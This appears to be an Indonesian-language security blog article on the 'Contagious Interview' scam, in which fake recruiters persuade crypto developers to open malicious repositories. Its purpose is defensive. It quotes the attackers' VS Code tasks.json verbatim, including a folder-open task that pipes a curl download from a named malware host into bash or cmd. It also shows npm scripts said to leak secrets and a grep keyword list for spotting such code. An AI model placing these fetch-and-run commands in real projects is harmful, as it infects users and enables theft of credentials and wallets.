Wawancara Menular: Bagaimana Perekrut Palsu Meretas Developer
Ringkasan: Gelombang baru serangan yang disponsori negara menghantam pengembang kripto top. Penipu menyamar sebagai Perekrut atau CTO dan memaksa kandidat untuk membuka kode berbahaya. Artikel ini membahas kasus "Martin Erazo", eksploitasi VS Code "tasks.json", dan "Protokol Pembakaran" yang diperlukan untuk bertahan hidup.
Penafian: Artikel ini mengutip insiden keamanan siber yang melibatkan identitas palsu orang sungguhan. Nama "Martin Erazo" dan "Ara Vartanian" merujuk pada persona yang digunakan oleh penyerang. Kami percaya individu nyata di balik nama-nama ini adalah korban pencurian identitas yang tidak bersalah.
1. Korban Sempurna: Persona "Martin Erazo"
Dimulai dengan pesan yang menekan semua tombol yang tepat untuk Senior Dev:
- Peran: CTO / Lead Architect
- Anggaran: Pendanaan terjamin $6M
- Tech: Web3, AI, Infrastruktur Terdesentralisasi
Dalam serangan yang baru-baru ini dikonfirmasi, seorang perekrut bernama "Martin Erazo" menghubungi melalui LinkedIn. Profil tersebut menggunakan nama dan foto direktur teater sungguhan, tetapi riwayat pekerjaannya palsu dan tiba-tiba beralih ke "Manajemen Proyek TI" pada tahun 2025 - tanda klasik akun yang disusupi atau dibeli.
Penipuan bergerak cepat. Mereka melewatkan penyaringan HR tipikal dan langsung ke "Wawancara Teknis" dengan eksekutif senior - dalam hal ini, meniru CTO industri nyata Ara Vartanian (saat ini di Limit Break).
Bendera Merah: Nama proyek berubah terus-menerus. Perekrut menjual "Betfin" (platform GameFi), tetapi slide deck yang dikirim adalah untuk "SpaceXView" (proyek Metaverse). Ketidakcocokan ini adalah petunjuk bahwa penipu mendaur ulang aset antar kampanye.
2. Jebakan: "Bisakah kamu meninjau kode MVP kami?"
"CTO" palsu itu mengklaim bahwa mereka membutuhkan mata ahli Anda untuk mem-vetting basis kode MVP (Minimum Viable Product). Mereka mengirim tautan ke GitHub Repo atau file ZIP dan menekan Anda untuk membukanya selama wawancara atau segera sesudahnya.
Di sinilah peretasan terjadi.
Mereka mempersenjatai keinginan Anda untuk membantu dan ego Anda. Anda pikir Anda sedang mencari bug di komponen React. Pada kenyataannya, "bug" itu adalah "fitur" yang dirancang untuk mencuri tabungan hidup Anda.
3. Intrusi Teknis: Zero-Click Malware
Penyerang menggunakan eksploitasi "zero-click" atau "low-click" yang menargetkan perkakas pengembang. Anda tidak perlu menjalankan aplikasi; cukup membuka folder saja sudah cukup.
Senjatanya: .vscode/tasks.json
Dalam kasus khusus ini, repo berisi file .vscode/tasks.json yang terinfeksi. File ini memberi tahu VS Code cara membangun proyek.
Kode Berbahaya:
{
"tasks": [
{
"label": "env",
"type": "shell",
"osx": {
"command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
},
"windows": {
"command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
},
"runOptions": {
"runOn": "folderOpen"
}
}
]
}
- "runOn": "folderOpen": Ini pemicunya. Segera setelah Anda membuka folder di VS Code, tugas ini berjalan secara otomatis.
- Payload: Menggunakan curl untuk mengunduh skrip dari
vscodesettingtask.vercel.app- host malware yang dikenal menyamar sebagai API pengaturan. - Hasil: Skrip berjalan di memori dan langsung mencuri kata sandi Chrome, cookie sesi, dan kunci SSH.
Rencana B: package.json scripts
Jika peretasan VS Code gagal, mereka memiliki skrip npm:
"scripts": {
"start": "node server/server.js | react-scripts start",
"prepare": "node server/server.js"
}
Menjalankan npm install atau npm start memicu server/server.js - skrip C2 (Command and Control) lokal yang membocorkan variabel lingkungan (kunci AWS, seed dompet) ke penyerang.
4. Bendera Merah vs Bendera Hijau
Bagaimana cara melihat ini sebelum terlambat?
Jika Anda seorang pengembang, "Repo Pribadi" (Private Repos) atau file ZIP harus memicu alarm tingkat tinggi. Perusahaan yang sah menggunakan Repo Publik atau platform pengujian standar.
Peringatan: Ini bukan satu-satunya vektor serangan pengembang. Baca tentang Perangkap Kolaborator di Discord dan bagaimana Serangan Rantai Pasokan membuat dependensi berbahaya.
| 🚩 Bendera Merah (Lari) | ✅ Bendera Hijau (Aman) |
|---|---|
| Kode Dulu: Mengirim kode sebelum tawaran kerja | Proses Standar: Wawancara dulu, kode kemudian |
| Identitas Rusak: Perekrut memiliki masa lalu yang tidak terkait (mis. Artis -> Manajer TI) | Sejarah Terverifikasi: Karier LinkedIn konsisten |
| Ketidakcocokan: Nama proyek tidak cocok (Betfin vs SpaceXView) | Konsistensi: Nama, dokumentasi, dan situs selaras |
| Urgensi: "CTO sedang menunggu", "buka sekarang" | Kesabaran: Menghormati waktu dan jadwal Anda |
| Email Pribadi: [email protected] | Email Perusahaan: [email protected] (dengan catatan MX yang berfungsi) |
5. Protokol Keamanan: Cara Wawancara dengan Aman
Jika Anda seorang Senior Dev, Anda akan diburu. Mengeraskan lingkungan Anda adalah wajib.
Protokol 1: Lingkungan "Burner"
Jangan pernah menggunakan stasiun kerja utama Anda untuk tes kode.
- Mesin Virtual: Gunakan VirtualBox atau VMWare.
- Lingkungan Dev Cloud: Gunakan GitHub Codespaces atau Gitpod. Mereka fana dan terisolasi dari file dompet lokal Anda.
Protokol 2: Audit Forensik
Sebelum membuka kode asing:
- Cek .vscode/tasks.json: Cari
runOn: folderOpen. - Cek package.json: Cari skrip preinstall atau postinstall yang mencurigakan.
- Kata Kunci: grep untuk
curl,wget,os.homedir(),.ssh,wallet.
Protokol 3: Pengerasan VS Code
Nonaktifkan "Workspace Trust" secara global.
- Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always
- Ini memaksa VS Code untuk meminta izin sebelum menjalankan tugas tingkat folder.
6. Solusi: "Protokol Pembakaran" (Burn Protocol)
Jika Anda membuka Repo berbahaya (seperti yang dikirim oleh persona "Martin Erazo"), anggap Anda telah disusupi. Menghapus saja tidak cukup.
- Putuskan: Cabut kabel ethernet segera.
- Bakar Dompet: Kunci Pribadi Anda bocor. Buat dompet baru di perangkat bersih (ponsel) dan pindahkan dana yang tersisa. Jangan pernah menggunakan kembali seed lama.
- Matikan Sesi: Keluar dari semua sesi Google, GitHub, AWS. Cabut token secara aktif.
- Cek Kunci SSH: Periksa pengaturan GitHub/GitLab. Penyerang sering menambahkan kunci SSH mereka untuk mempertahankan akses pintu belakang. Hapus apa pun yang tidak Anda kenali.
- Nuke It: Hapus drive dan instal ulang OS. Ini satu-satunya cara untuk yakin 100% rootkit hilang.
Kesimpulan
Penipuan "Wawancara Menular" menggunakan keahlian Anda sendiri untuk melawan Anda. Ini menargetkan keinginan Anda untuk memecahkan masalah. Tapi di Web3, paranoia adalah kebajikan profesional. Verifikasi setiap identitas, isolasi setiap repo, dan jangan pernah percaya "perekrut" yang terburu-buru menyuruh Anda menjalankan kode.
Artikel Terkait
Racun Rantai Pasokan (Supply Chain Poison): Saat pembaruan tepercaya menjadi berbahaya
Anda tidak mengunduh sesuatu yang aneh. Anda hanya memperbarui aplikasi Ledger... Dan kemudian uangnya hilang. Teror serangan rantai pasokan.
Perisai Kertas (The Paper Shield): Cara Mencadangkan Seed Phrase dengan Benar
Tangkapan layar adalah bencana. Cloud adalah komputer orang lain. Satu-satunya cara aman untuk menyimpan kunci pribadi adalah 'Baja' dan 'Kertas'.
Penipuan Jangka Panjang (The Long Con): Psikologi di Balik 'Pig Butchering'
Dia tidak mengirim pesan ke nomor yang salah. Dan dia tidak jatuh cinta padamu. Menyelami 'Sha Zhu Pan', penipuan crypto paling kejam, dan cara mengenali naskahnya.